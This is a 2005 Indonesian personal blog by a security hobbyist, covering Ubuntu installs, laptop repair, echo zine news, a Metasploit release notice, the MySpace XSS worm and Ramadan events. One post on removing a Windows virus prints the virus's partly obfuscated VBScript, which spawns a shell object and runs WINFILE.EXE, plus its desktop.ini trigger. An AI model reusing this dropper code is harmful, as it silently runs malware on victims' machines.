Monday, October 31, 2005

Mudik Time

0 comments
Hari ini gw akan menuju Palembang (kampung halaman tercinta) dan InsyaAllah sampai tgl 7 November di Palembang, laptop bermemori 128pun terpaksa di bawa untuk menemani, gw dah bawa bekal sih :p, 1 buah CMS phpwebsite untuk di oprek dan dicari kekuatannya (bug :P) , 2 buah potongan artikel yang aku rasa bakalan keren banget :) , artikel pertama di tulis oleh Fyodor yang berjudul "Return on Investment yang merupakan salah satu chapter dari "best-seller Stealing the Network: How to Own a Continent." , 1 buah lagi merupakan karya dari Brian HAtch yang juga merupakan kontributor nmap yang juga dirilis sebagai sekuelnya dengan title " Syngress Stealing the Network: How to Own an Identity.

Rencananya sih sekalian mo kerjain java tapi ternyata mo donlod jsdk-nya ampe jam segini (padahal dah mo bernagkat) tapi belun kelar ..
y3dips@heaven:~$ sudo apt-get install j2sdk1.4
Password:
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
j2re1.4 java-common libc6 libc6-dev libc6-i686 linux-kernel-headers locales
Suggested packages:
mozilla-browser j2sdk1.4-doc equivs glibc-doc manpages-dev
Recommended packages:
gsfonts-x11
The following NEW packages will be installed:
j2re1.4 j2sdk1.4 java-common
The following packages will be upgraded:
libc6 libc6-dev libc6-i686 linux-kernel-headers locales
5 upgraded, 3 newly installed, 0 to remove and 908 not upgraded.
Need to get 26.1MB/39.1MB of archives.
After unpacking 70.7MB of additional disk space will be used.
Do you want to continue [Y/n]? y
Get:1 http://archive.ubuntu.com breezy/multiverse j2re1.4 1.4.2.02-1ubuntu3 [22.5MB]
Err http://archive.ubuntu.com breezy/multiverse j2re1.4 1.4.2.02-1ubuntu3
Connection timed out [IP: 82.211.81.151 80]
Get:2 http://archive.ubuntu.com breezy/multiverse j2sdk1.4 1.4.2.02-1ubuntu3 [3545kB]
7% [2 j2sdk1.4 2012915/3545kB 56%]
Kayaknya gak jadi deh bawa java :P (syukur syukur bisa memulai nulis buku , hiks hiks .. )

OK guyz, im heading to west .. goin back to my parent home :lol: , keep everything "hot" till i get back here :P

Sunday, October 30, 2005

My Badger

0 comments
Akhirnya setelah hampir 1 mingguan gw donlod Ubuntu 5.10 via GPRS matrix yang hampir gak bisa gw manfatin lagi mulai bulan bulan ke depan ( baca juga matrix-is-finish ) , akhirnya gw mencoba menginstall Breezy Badger ke laptop gw yang sudah turun kelas ( toshiba tecra 8100, p 3, 600 MHz, ram 128 ; baca juga laptopku-sayang ) dan ternyata masih cukup baik berjalannya (/swap 1GB :P)

Tetapi gw menemukan masalah baru , yaitu menjalankan pppd untuk melakukan koneksi GPRS matrix via bluetooth menggunakan bluez ,semua settingan seperti di artikel Internet via GPRS dan bluetooth atau sama persis seperti setingan di hoary, semua berjalan sempurna, saat pengeksekusian ./gprs script pun semua berjalan sempurna tetapi tidak dilanjutkan pengeksekusian "pppd call gprs" , begitu di lihat lognya di "messages" terdapat info " dev_fs_mkdev: could not append to parent for bluetooth/rfcomm/0 " yang menurut analisa gw sih kemungkinan masalahnya di bluez dan kernel 2.6.12 nya , cuma ya belun tau lah soalnya belun teliti lebih lanjut , temen temen ada yang tau ?

vol IV - issue #13

0 comments
.:. mana nih yang ke 13 ... payah nih echo staff di undur-undur mulu ..
.:. issue 13 kapan keluar ?
.:. ezine dah mati yah ?
[dan beberapa pertanyaan lainnya yang kurang lebih bernada sama]
Karena banyaknya pertanyaan tentang issue 13 echo zine maka dengan sengaja gw buat sedikit penjelasan tentang issue 13 ini di blog gw, dengan tujuan bagi temen temen yang ngebaca dapat memakluminya , ini salah satu jawaban yang gw harap dapat menjawab pertanyaan temen temen semua
baca dunk info di rilis terakhir *_^

"Informasi tambahan, mulai issue 12 echo zine akan diterbikan 4 bulan
sekali untuk memberikan cukup waktu bagi kontributor mempersiapkan
tulisannya." <introduction - vol III - issue 12 - phile 01 >

sehingga kemungkinan untuk issue #!3 akan dirilis awal taun 2006 , sedangkan CFP a.k.a Call for paper (hasil diskusi dengan "anonymous" ) akan kita keluarkan selepas hari raya "LEBARAN".

tetapi bagi temen temen yang berminat mengirimkan artikel dapat langsung saja mengirimkan artikelnya ataupun mengirim ide, saran, kritik, cacian dan usulan ke ezine@echo.or.id

salam
---
y3dips
Semoga dengan sedikit penjelasan ini dapat melegakan hati temen temen semua, btw thxs atas semua feedback yang di kirimkan, serta kami cukup "bangga" dengan apresiasi temen temen semua, selebihnya mari sumbangkan artikelmu ?

buber ? :(

0 comments
Pertama tama gw minta maaf buat temen temen semua yang ikutan buber karena /me dan adek gak bisa ikutan, yang jelas gw minta maaf buat "adek" yang udah bela belain bermacet macet ria dan berhujan hujanan tapi ternyata Bubernya gak bisa ikutan (kesian dia dah terkulai lemes) :(

Dah berangkat dari jam 1, terus hujan hujan eh malah jam 6 sore baru nyampe PGC , n terus ujan lagi , tapi akhirnya sempet juga mampir ketempat "adek" (nganter balik) :P , walau nyampe rumah lagi agak "malem" , mudah mudahan bubernya sukses yah *_^ , sekali lagi sorry buat semua yang menunggu dengan harap2 cemas akan kehadiran gw (huek .. huek , kayak pejabat :P), sungguh ini gak ada unsur kesengajaan loh .. mudah mudahan lain kali bisa lebih lancar (tanpa ujan dan macet :(, tempatnya mungkin di buat netral yah :P )

Wednesday, October 26, 2005

new echo logo RC 0.1

0 comments

Dah lama pengen nge-deface tampilan homesite echo.or.id cuma masih belum ada waktu dan kesempatan, jadinya aku coba untuk mulai nyicil deh dengan buat logo baru (diatas) yang masih versi release candidate 0.1, adapun untuk artinya kurang lebih sama dengan logo lama, cuma berupa kumpulan huruf "E" "C" "H" "O" yang di bentuk sedemikian rupa berwarna hitam denagn sedikit inner bevel (smooth) ditambah gelombang yang mengartikan kata "echo" bisa berarti "gema" serta di beri warna hijau menyala.

any comment or suggestion ?

Tuesday, October 25, 2005

Laptopku Sayang ..

0 comments
Eit dia ngambek lagee, abis uncompressing kernel dia gak mau loading kernel :( , Hang ??? , ternyata sekarang dia ngambek lagi. Akhirnya terpaksa aku bongkar lagi (was was gitu dech..) , pertama yang jadi target adalah hardisknya aku kira hardisknya bermasalah tapi ternyata gak pake hardiskpun tetep error (aku cobain pake LIVEcd ubuntu), aku coba install ulang juga gagal di ACPI error, wayoh .. (padahal aku emang gak berpengalaman dengan laptopz error).

Akhirnya semuanya aku pretelin, aku lepas batere, cdrom drive, hardisk, memori dan sangkarnya sambil aku cari cari di internet tentang infonya, eh nemuin kalo Tecra 8100 itu permasalahannya adalah di slot memori, akhirnya memori aku cobain satu satu [aku punya 2 buah 128], Ajaib Nyala, wuih aku gak yakin, coba tuker Slot [dengan 1 memori] wuih gak nyala :( , coba pake memori satunya [masih cuma dipasang 1] , di slot yang pertama nyala eh di slot kedua dia gak nyala, aku pasang dua duanya dia balik nge-hang di uncompressing kernel... nah lo? ternyata slot memorinya satunay error, n praktis sekarang gw pake memori 128 :( [ada yang asik disini, buat ngeload XP SP2 , buih berasa lemot abis, tapi ngeload ubuntu tidak terlalu significant (inget, ini loading awal loh :P) , karena /swap gw 1 GB :P] , alhasil semaleman gw nyariin tempat jual memori untuk tecra 8100 dan dapet merk "kingston" tetapi maksimalnya cuma 256 tipe KTT SO100 , hiks hiks.. nah ini juga belum tau beli dimana.. besok deh tanya temen, yang penting bukan motherboard atau error yang parah lainnya, sekarang laptopnya dah bisa jalan walau kudu tertatih tatih :p

Monday, October 24, 2005

Wordis HIMTI Binus

0 comments
Acaranya sih tanggal 18 kemaren di Universitas Bina Nusantara, kebetulan gw ma 0byt3 yang dateng kesono , cuma fotona baru bisa di upload oleh 0byt3 hari ini, dan juga gw baru bisa internet hari ini jadinya baru bisa upload :), banyak kejadian seru dan lucu di situ, asik juga sih :) walau tetap ada hal-hal yang mengganjal di otak gw ampe sekarang :D (yang jelas laptop gw jadi error pas mo seminar, eh pas balik dia sembuh lagi n sekarang lagi MemTest Kernel via Ubuntu tuh :p )

he..he.. gw pake baju gratisan dikasih temen2 HITB waktu bcs05 kemaren
oh iya , kali ini modelnya bukan seminar tapi workshop dengan hands On training, tema yang gw angkat kali ini berjudul " Penetrate @ System dengan sub title "A few collection of X-rubbish technique ", emang sih gak bakal maksimal dengan waktu sesingkat itu (ampe nyolong waktu-nya 0byt3 [bawain materi identify your system] :P ) tapi mudah mudahan sedikit banyak membuka wawasan para peserta.

Matrix is finish !

0 comments
Pertama sih liat iklan di koran soal perubahan tarif GPRS matrix , trus abis baca di forum matrix-centro.com , eh barusan aja abis tilpun 111 n ngobrol panjang lebar ma Customer service-nya :P, dan ternyata emang bener :( , alias buat pemakai tarif flat lama secepatnya melakukan konfirmasi perubahan packet dsb, jika tidak amaka terhitung 1 Desember 2005 maka akan di kenakan tarif retail (15 rp/KB).

Hiks hiks, makin terancam deh kehidupan gw di dunia maya (internet) , kalo gak ada paket flat lagi kayaknya gw harus menyudahi perjalanan dengan "matrix", dan saat ini belum tau mo menggunakan apa untuk memasuki dunia maya ini nantinya, so sebelum itu gw mo menyelesaikan duluw donlodan Breezy Badger gw yang dah 59% [383Mb] sebelum November , hehehehe.

Selanjutnya .. We`ll See .. , soalnya tagihan matrix gw bulan pemakaian September-oktober dah menyentuh level membahayakan (500 rebu [ GPRS 50 % , pulsa 50 %] :P , kalo nyokap tau bisa di semprot abis abisan neh , hehehe , untung "ibuk" gak pernah internetan :P) , dan sapa tau setelah ini bisa jadi hemat banget dan menabung untuk hari tua (hueheuue, walau aku gak habis pikir hidup tanpa bandwidth hiks hiks hiks :()

Thursday, October 20, 2005

Metasploit v2.5

0 comments
Yesterday, H D Moore has announce about the new version of Metasploit Framework. The Metasploit Framework is an advanced open-source exploit development platform. The 2.5 release includes three user interfaces, 105 exploits and 75 payloads.

This release is available from the Metasploit.com web site:
- Unix: http://metasploit.com/tools/framework-2.5.tar.gz
- Win32: http://metasploit.com/tools/framework-2.5.exe

A demonstration of the msfweb interface is running live from:
- http://metasploit.com:55555/

Wednesday, October 19, 2005

Masih Ada malaikat ?

0 comments
Kekampus pagi ?? hal yang paling gw sebelin selain gw kudu bangun pagi (hehehe) terutama dan paling utama (dimarahin guru bahasa nih kalo kata katanya gini :P) adalah macetnya, karena itu gw lebih memilih mutus mutus jalur untuk mempersingkat waktu (i hate traffic jam !, what a wasting time) meskipun dengan catatan naik kendaraan umum lebih banyak dan mengeluarkan biaya sedikit lebih mahal, Nah kebetulan hari ini gw telat bangun :( , sehabis sahur gw tidur lagi dan terbangun pukul 07.10 (padahal harus tiba di kampus jam 08.15) praktis cuma ada waktu 1 jam untuk kekampus. Setelah siap siap akhirnya jam 07.30 saya berangkat kekampus.

Sampai naik angkutan ketiga tidak ada masalah nah begitu pindah ke angkutan keempat (KOPAJA) saya baru menyadari kalau saya tidak memiliki uang "receh" , praktis pecahan terkecil adalah Rp.50.000 , daripada bikin ribut dengan "assisten supir" maka saya menanyakan ke orang yang duduk di sebelah (kebetulan sepertinya seorang mahasiswi yang "alhamdulillah" mengenakan pakaian muslimah)
GW : maaf mbak, punya pecahan 50 ribuan gak ? (sambil gak yakin)
Mbak : aduh, gak punya mas, emang buat apa ? (sudah siap di tangan dengan uang 1500 rupiah)
GW : enggak, cuma buat bayar ongkos , saya gak punya recehan (sambil mikirin gimana cara dapet recehan yah)
Mbak : Oh, kalo gitu pake uang saya aja mas , sambil membuka tas untuk mengambil uang
GW : wah gak usah mbak .. gak usah (dengan ragu ragu :()
Mbak : GPP mas , gak apa apa (sudah memegang uang 5000 rupiah)
GW : Wah biar saya bayar aja ke kernet-nya pake 50ribuan ini mbak sapa tau dia punya kembaliannya

Walhasil akhirnya memakai uang mbak itu karena kernetnya langsung berubah raut mukanya waktu liat uang 50 ribu (maklum masih pagi ...)

***Sambil bingung mo gimana*** coba berpaling ke Mbaknya , Ups ternyata mbaknya lagi "tadarus" ,(sepanjang jalan gw cuma bengong sambil mikirin gimana ngebayar uang si mbak ini, akhirnya gw mutusin untuk berdoa aja buat amal baik mbaknya) , Begitu mulai memasuki gerbang kota Depok mbak-nya merapikan Alquran-nya dan barulah aku tanyakan
GW: mau turun mbak?
Mbak: Iyah
GW: wah saya gak tau gimana bayarnya ya mbak (**tampang gak jelas***)
Mbak: gak usah mas, saya ikhlas kok (sambil senyum)
GW:makasih banget nih mbak, mudah-mudahan amalnya dibales sama yang diatas
Mbak: amin (**sambil tersenyum**)

Lalu bus berhenti dan dia turun.

Ternyata, Masih ada "malaikat" diantara kita, gw yang notabene "pesimis" dan gak pernah mau berharap pada "kebaikan" orang lain ternyata hari ini telah disadarkan, seseorang yang tidak dikenal sebelumnya rela memberikan "uang"nya secara cuma cuma , Sementara masih gak yakin kalo gw bisa ngelakuin hal yang sama, sambil berharap agar "kita semua bisa menjadi malaikat bagi manusia lainnya".

"Sampai sekarang tak ada info yang bisa kudapat mengenai si-mbak , mudah mudahan Allah membalasnya dengan berkali lipat, amin" .

Monday, October 17, 2005

WINFILE ?

1 comments
Dah lama gak main main winblows, eh pas pake winblows buat cobain tuk bahan bicara di BINUS besok terpaksa pake winblows yang dah lama gak dipake (dual ma ubuntu di junk server) , kebetulan aku pake SP2 .. hehehe

nah, kebetulan sekalian ngopiin file "ngaji" ke IPOD via iTunes supaya bisa di dengerin , eh tiba tiba di ipod ada file WINFILE (maklum abis dipake ma adek n baru balik tadi , n ternyata nyisain sedikit oleh oleh :p ) , hehehe, iseng iseng tak eksekusi eh kok gak bereaksi , karena mencurigakan maka tak DELETE aja hehehehe, SHIFT + DEL (biar gak masuk recycle) , yups aman.. eh... wuih filenya tiba tiba muncul lagi :) (ajaib :P) , wuih ... karena males ngeberesinnya , aku pikir nanti deh di ubuntu tak hapus :P (pengen tau secanggih apa sih nih virus kalo gak nemu registry di OS, di linux mana ada registry ..lol.. :P)

Ya udah , install APPSERV (untuk latihan simulasi via webhacking) , tapi tiba tiba pas browse direktori C:\ , eh WINFILE dah muncul disitu dan nongkrong dengan pongahnya (sialan!!) , ya udah deh aku langsung pencet Ctrl+Alt+DEl (walau bego bego gini aku tau dimana biasanya program ini bercokol) , eh ada image name Wuur (yah walau dah lama gak pake windows tapi alhamdulillah masih inget mana service dengan image name aseli dan fake :P , dan juga dulu kebetulan pernah belajar "virus-virus-an" dikit ..heheh...) langsung aja aku kill/matiin (ternyata gak terlalu canggih nih virus) , abis itu tak search semua file WINFILE , n aku delete aja, yup 1 lagi harus cari tau pemicunya (pembangkitnya), biasanya sih di autoexec, startup, or cara termudah ketik di run -- > msconfig (hum, bisa masup, ternyata virusnya cuma buat iseng nih, gak ada canggih canggihnya, gantian /me songong dikit ... :p ), masuk bagian stratup eh nemuin lagi Startup Item WUUR yang mengeksekusi command ke "C:\WINDOWS\TEMP\WUUR.exe", ya udah tinggal drivethrough ke dir WINDOWS\TEMP dan aku delete langsung deh "WUUR.exe", langsung rebes degh (ternyata gw gak goblog goblog banget yah :P ).... sayang gak sempet Reverse engineering file wuurnya abis gw gak mau lama lama di winblows :p

btw dia juga buat dua file lain yang pertama "comment.htt" yang merupakan VBS berisikan
<#ody><#tml>
<#ody >
<#cript language=vbscript>
document.write "
"

<#cript language=vbscript>
On Error Resume Next
Dim we,path,win
we = ""
Path = ""
win=""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)
Set Ap#leObject = document.ap#lets("lhw")
Ap#leObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Ap#leObject.createInstance()
Set Ws#hell = Ap#leObject.GetObject()
Ws#hell.run(Path + "WINFILE.EXE")
<#script>
<#body>
<#html>
<#body>

dan desktop.ini
[.Sh#llCl#ssInfo]
HTMLInfoTipFile=file://C#mment.htt
Conf#rmFileOp = 0

2 file di kacaukan biar kalo buka blog gw gak di blok antivirus :p , sekalian delete aja kedua file itu :)

btw , gw gak pake ANtivirus tuh :P !!!!!!

Sunday, October 16, 2005

XSS worm floods Myspace

0 comments
Antara Kaget dan tidak juga mendengar judulnya , pertama kali tahu dari temen temen di waraxe yang posting artikel soal ini di sini (maklum sekarang dah agak jarnag online) , kenapa aku gak terlalu kaget ? karena belum berapa lama aku telah menulis di blog ini juga tentang kemungkinan serangan yang bisa dilakukan dengan BBCODE dan HTMLcode [ baca juga from html to [bbcode] , disitu aku tidak melengkapi detil tekniknya dengan sengaja :p ] , eh malah muncul jenis worm baru yang cukup menghebohkan myspace.com (merupakan salah satu situs penyedia layanan untuk komunitas seperti friendster dan 360) yang beritanya di rangkum di betanews.com, dan juga di slashdot.org.

Ternyata perkataanku tentang "walau efeknya relatif lebih kecil terhadap system" di post sebelumnya harus aku tarik kembali karena ternyata hal ini terbukti mampu membuat " MySpace was taken offline while the worm was removed from all user profiles." , hehehehehhe .. interesting isnt it ???

Well, first i dont even know each other with that "clever" myspace user, second i dont just give a bullshit on my post in early month (coz ive already prove it *_^) , i tell u the same as i told u in my past post, "our world are so vulnerable" :) , so Watchout!

Saturday, October 15, 2005

History of linux

0 comments
Gara gara iseng iseng mo bantuin "adek" tuk nyari semua-hal (ctrl-a) tentang linux eh malah nemu link bagus "https://netfiles.uiuc.edu/rhasan/linux/" yang ternyata dah dibuat dari tahun 2002 (telat banget, hisk hiks) yang berisikan info mengenai sejarah linux.

Disitu dikatakan bahwa Linus (linus Benedict Torvalds) sendiri pesimis dengan OS yang dia buat
"In August 25, 1991 the historic post was sent to the MINIX news group by Linus .....
From: torvalds@klaava.Helsinki.FI (Linus Benedict Torvalds)
Newsgroups: comp.os.minix
Subject: What would you like to see most in minix?
Summary: small poll for my new operating system
Message-ID: <1991Aug25.205708.9541@klaava.Helsinki.FI>
Date: 25 Aug 91 20:57:08 GMT
Organization: University of Helsinki

Hello everybody out there using minix -
I'm doing a (free) operating system (just a hobby, won't be big and
professional like gnu) for 386(486) AT clones. This has been brewing
since april, and is starting to get ready. I'd like any feedback on
things people like/dislike in minix, as my OS resembles it somewhat
(same physical layout of the file-system (due to practical reasons)
among other things). I've currently ported bash(1.08) and gcc(1.40),and
things seem to work.This implies that I'll get something practical within a
few months, andI'd like to know what features most people would want. Any
suggestions are welcome, but I won't promise I'll implement them :-)
Linus (torvalds@kruuna.helsinki.fi)
PS. Yes - it's free of any minix code, and it has a multi-threaded fs.
It is NOT protable (uses 386 task switching etc), and it probably never
will support anything other than AT-harddisks, as that's
all I have :-(
.


begitu juga dengan komentar dari bapak "minix" Prof.A Tanembaum
" I still maintain the point that designing a monolithic kernel in 1991 is a fundamental error. Be thankful you are not my student. You would not get a high grade for such a design :-)"
(Andrew Tanenbaum to Linus Torvalds)


Hell care , linux sekarang sudah bukan "hacker toys" lagi tapi sudah menjadi salah satu Operating System yang diperhitungkan !

semua berawal dari "ketidakmungkinan" dan "pertentangan" tetapi berakhir dengan "kesuksesan", prosesnya yang akan menentukan !

/me jadi inget waktu bermimpi membuat echo.or.id , "ketidakmungkinan, pertentangan" mudah mudahan berakhir dengan kesuksesan , amin *_^


Friday, October 14, 2005

Ubuntu 5.10 (Breezy Badger)

0 comments
U can Download Breezy Badger at :

  • United States: http://us.releases.ubuntu.com/releases/5.10/
  • Europe: http://se.releases.ubuntu.com/5.10/
  • United Kingdom: http://releases.ubuntu.com/5.10/
  • Rest of the World: http://releases.ubuntu.com/5.10/

    Or u can updated your repository to breezy
    y3dips@heaven:~$ cat /etc/apt/sources.list

    deb cdrom:[Ubuntu 5.04 _Hoary Hedgehog_ - Release i386 (20050407)]/ hoary main restricted

    #deb http://komo.vlsm.org/ubuntu breezy main restricted multiverse universe
    #deb http://komo.vlsm.org/ubuntu breezy-updates main restricted universe multiverse

    ## Uncomment the following two lines to fetch updated software from the network

    deb http://id.archive.ubuntu.com/ubuntu breezy main restricted
    deb-src http://id.archive.ubuntu.com/ubuntu breezy main restricted

    ## Uncomment the following two lines to fetch major bug fix updates produced
    ## after the final release of the distribution.

    deb http://id.archive.ubuntu.com/ubuntu breezy-updates main restricted
    deb-src http://id.archive.ubuntu.com/ubuntu breezy-updates main restricted

    ## Uncomment the following two lines to add software from the 'universe'
    ## repository.
    ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
    ## team, and may not be under a free licence. Please satisfy yourself as to
    ## your rights to use the software. Also, please note that software in
    ## universe WILL NOT receive any review or updates from the Ubuntu security
    ## team.

    deb http://id.archive.ubuntu.com/ubuntu breezy universe
    deb-src http://id.archive.ubuntu.com/ubuntu breezy universe

    deb http://security.ubuntu.com/ubuntu breezy-security main restricted
    deb-src http://security.ubuntu.com/ubuntu breezy-security main restricted

    deb http://security.ubuntu.com/ubuntu breezy-security universe
    deb-src http://security.ubuntu.com/ubuntu breezy-security universe

    deb http://archive.ubuntu.com/ubuntu breezy multiverse
    deb-src http://archive.ubuntu.com/ubuntu breezy multiverse

    ## Backports
    #deb http://ubuntu-backports.mirrormax.net/ breezy-backports main universe multiverse restricted
    #deb http://ubuntu-backports.mirrormax.net/ breezy-extras main universe multiverse restricted

    ## Marillat
    #deb ftp://ftp.nerim.net/debian-marillat testing main


  • Thursday, October 13, 2005

    Kumat apa doyan ?

    0 comments
    Hm, Gini nih kalo lagi "kumat" atau lagi "doyan" yah ? , soalnya hari ini aku total kelar ngerjain 2 web blog (Unbelieveable), yang pertama itu blog-nya id-ubuntu di http://ubuntulinux.or.id yang di kerjain dari awal installasi Word press-nya sampe ngedit themes-nya (walau hasilnya gak maksimal, soalnya kemaren dah janjian ma amri shodiq soal dia yang ngerjain themes-nya , jadinya themesnya sekarang itu cuma seadanya alias ngambil gambar situs "id-ubuntu" yang dulu :) ) , sisanya sih ngisi berita dan sedikit artikel di web blog yang aku paksain jadi Home page "id-ubuntu" :p.

    Nah yang kedua adalah blog aku sendiri yang beralamat di http://y3d1ps.blogspot.com alias yang "aku" tulisin ini :P . Jreng .. Jreng .. Jreng .. temanya kali ini adalah Here comes Spidey!, yupe ! , my favourite Super hero ever yang akhirnya (At Last!!!) menjadi themes blog aku kali ini dipadu dengan laba laba pada body content-nya menambah keren blog aku *_^. Pokoknya TOP degh .... Ciaooooo

    Monday, October 10, 2005

    Buka puasa with Echo

    2 comments
    From: "z3r0byt3"
    Date: Sun Oct 9, 2005 10:37 pm
    Subject: [FYI] Tentang Buka Puasa Bersama

    Dear All,

    Masih mengenai rencana untuk acara buka puasa bersama. Meski Masih
    sedikit yang merespon acara ini, tapi saya mewakili teman-teman echo,
    masih tetap semangat untuk mengadakan acara ini.

    Kemarin saya telah melakukan survei tempat untuk acara tersebut.
    Sangat sulit sekali mencari tempat yang bersifat santai namun
    terjangkau. Semua tempat telah terisi penuh pada tanggal tersebut, dan
    kebanyakan dari mereka tidak bisa menerima booking tempat. Di
    sela-sela "nyaris" putus asa, akhirnya alhamdulillah dapat juga tempat
    untuk acara tersebut. Berikut rincian tempat, tanggal, dan biaya serta
    bagaimana cara untuk ikut acara tersebut:

    Hari & tanggal: Sabtu, 29 Oktober 2005
    Tempat : AYAM BAKAR WONG SOLO.
    Jl. Raya Kali Malang Blok A2 8/9
    Pondok Kelapa, Jakarta Timur
    (Tepat Di Lampu Merah Lampiri)

    Biaya per-orang: Rp. 25.000

    Bagi yang berminat pembayaran bisa dilakukan dengan cara seperti
    pendaftaran seminar ECHO di JCC tempo hari. Dengan cara sebagai berikut:

    - Setorkan langsung uang tersebut ke bank mandiri terdekat, dengan
    nomor rek tujuan:

    126-000-4460-886
    A/N: IRVAN S.KOM / AHMAD MUAMMAR WK

    - Simpan bukti setoran, karena bukti ini akan digunakan pada saat
    pendataan ulang pada saat acara buka puasa nanti.

    - Setoran tunai langsung ini dilakukan karena transfer via ATM tidak
    dapat dilakukan jika nominalnya di bawah Rp. 50.000

    - Setelah melakukan setoran dan menyimpan bukti setoran, silahkan
    konfirmasikan melalui email ke alamat z3r0byt3@echo.or.id dengan
    format sbb:

    Subject: Konfirmasi BUBER

    Nama Lengkap:
    No telp :
    No. HP :
    Tanggal Setor:
    Kantor cabang tempat menyetor:

    *Catatan: Format harus benar-benar sama, sebab akan dilakukan
    filtering pada mailbox saya.

    - Acara akan terselenggara jika sampai pada waktu 5 hari sebelum hari
    H, peserta yang sudah melakukan setoran mencapai 30 orang.

    Saya rasa cukup informasi mengenai acara ini. Untuk keterangan lebih
    lanjut, bisa hubungi saya via japri dengan alamat:

    z3r0byt3@echo.or.id
    telp: 021-30110500


    Terimakasih

    -z3r0byt3-

    Sunday, October 09, 2005

    Final Fantasy VII

    0 comments
    Akhirnya baru sempet buat nonton film "FINAL FANTASY VII [advent children]" , kemaren untungnya sempet minjem punya temen :P, ternyata filmnya tuh keren banget !!! (norak deh gw , telat banget taunya :P) , animasi 3D nya itu TOBH banget, alussssss ... , apalagi waktu "cloud" bertarung di jalanan , bueh bueh ... ck ck ck /me gak abis fikir ... salute .. ini baru Hacker yang bikin tuh !!!

    Saturday, October 08, 2005

    Pure..Saturday

    0 comments
    Wahehhe, abiz jalan ma "adek" maen maen ke BLOK-em , ceritanya sih mo nga-buburit (bener gak spell-na?), apa daya "mata beler" ditambah 'level' lagi gak fit (semalem cuma tidur praktis kurang lebih 3 jam , 02.30-03.00 + 04.30-06.30) jadinya "kita" malahan nongkrong di w-net , ajaibnya TUH warnet pake UBUNTU , ajaibnya lagi "rame" loh yang main disana ( dari 15 pc mungkin yang kosong cuma 2 , harganya relatif mahal lageee , 4000 per 30 menit ) , ajaibnya lagi yang jaga-nya "cewe" (walau dia gak mau masangin iPOD gw ke colokan USB dibelakang (gw pasang ndiri :P)) !!!!

    Alhasil jadinya maen di w-net ampe jam 5 (sebenernya mo bantuin cariin bahan buat "adek") trus Ashar di situ juga (puih penuh sesak euy) , trus cari tempat ber-buka-puasa dan bertemulah salah satu tempat makan "CW" (*nama aseli di samarkan , karena produk dagang :P, pesen sih gak salah salah , udah pake juice trus milkshake pulak + fried chicken .. ehuehueue , tapi "adek" gak habis makannya :P , mukanya ampe merah ...heheheh ; emang sih gw yang maksain dia mesen banyak :P) , akhirnya abis sholat maghrib kita cabz .. sampe rumah jam 8 n sekarang kepala !gw nyut.. nyut.. nyut , dan sempet ol bentar buat cek email dari ny.irvan soal beberapa "point" penting yang se-yogya-nya gw respons secepetnya (tapi bukan dengan unsur kesengajaan sehingga gw gak bisa reply ASAP :( ) dan dengan "5 watt" yang tersisa akhirnya berhasil gw respons di hari yang sama walau sedikit telat, maaf yah ...

    Sekarang mo istirahat duluw nih, abis tadi nelpon "adek" eh malah sempet di omelin biar langsung tidur aja sehabis sholat ... heuheuheu ... ciaoooo

    Friday, October 07, 2005

    Breezy Badger RC

    0 comments
    At last , naik peringkat dari preview release ke release candidate , ada yang mau donlodin gw Ubuntu 5.10 (Breezy Badger) Release Candidate di http://releases.ubuntu.com/5.10/ , heheheh

    Gak sabar nih mo cobain :) , cuma GPRS baru bisa kerja pas gw [off] , maybe sabtu, minggu, senin baru tak donlod :P

    Thursday, October 06, 2005

    Choleric Melancholy !

    0 comments
    .... The Extrovert ,The Doer, The Optimist ...

    Weaknesses of a Choleric


    The Choleric's Emotions

  • Bossy
  • Impatient
  • Quick-tempered
  • Can't Relax
  • Too impetuous
  • Enjoys controversy and arguments
  • Won't give up when loosing
  • Comes on too strong
  • Inflexible
  • Is not complimentary
  • Dislikes tears and emotions
  • Is unsympathetic

    The Choleric At Work

  • Little tolerance for mistakes
  • Doesn't analyze details
  • Bored by trivia
  • May make rash decisions
  • May be rude or tactless
  • Manipulates people
  • Demanding of others
  • End justifies the means
  • Work may become his god
  • Demands loyalty in the ranks

    The Choleric As a Friend

  • Tends to use people
  • Dominates others
  • Knows everything
  • Decides for others
  • Can do everything better
  • Is to independent
  • Possessive of friends and mate
  • Can't say, "I'm Sorry"
  • May be right, but unpopular

    Strengths of a Choleric


    The Choleric's Emotions

  • Born leader
  • Dynamic and active
  • Compulsive need for change
  • Must correct wrongs
  • Strong-willed and decisive
  • Unemotional
  • Not easily discouraged
  • Independent and self sufficient
  • Exudes confidence
  • Can run anything

    The Choleric At Work
  • Goal oriented
  • Sees the whole picture
  • Organizes well
  • Seeks practical solutions
  • Moves quickly to action
  • Delegates work
  • Insists on production
  • Makes the goal
  • Stimulates activity
  • Thrives on opposition

    The Choleric As a Friend

  • Has little need for friends
  • Will work for group activity
  • Will lead and organize
  • Is usually right
  • Excels in emergencies

    Thats me [less are truth :P, you decide it? :P] ! how about you ?
    source : http://www.oneishy.com/personality/personality_test.php
  • Tuesday, October 04, 2005

    Romadhon , aku datang :)

    0 comments
    Alhamdulillah ya Allah, Engkau hampir sampaikan umurku kebulan penuh berkah milik-Mu, Semoga di bulan ini nantinya hamba dapat belajar menjadi lebih baik, berbuat lebih baik, berkerja dan beribadah dengan lebih baik serta agar dapat mulus menjalaninya dengan hasil maksimal dan InsyaAllah hasilnya akan berguna untuk kehidupan hamba selanjutnya. amin ya robbal alamin.

    Bagi teman teman semua baik yang di kenal langsung atau tidak maka dengan keikhlasan hati ammar meminta maaf atas semua kesalahan baik yang dilakukan secara sengaja ataupun tidak sengaja, InsyaAllah denagn ini kita semua dapat menikmati kemurnian romadhon.

    Marhaban ya romadhon ....

    Sunday, October 02, 2005

    Clustermind

    0 comments
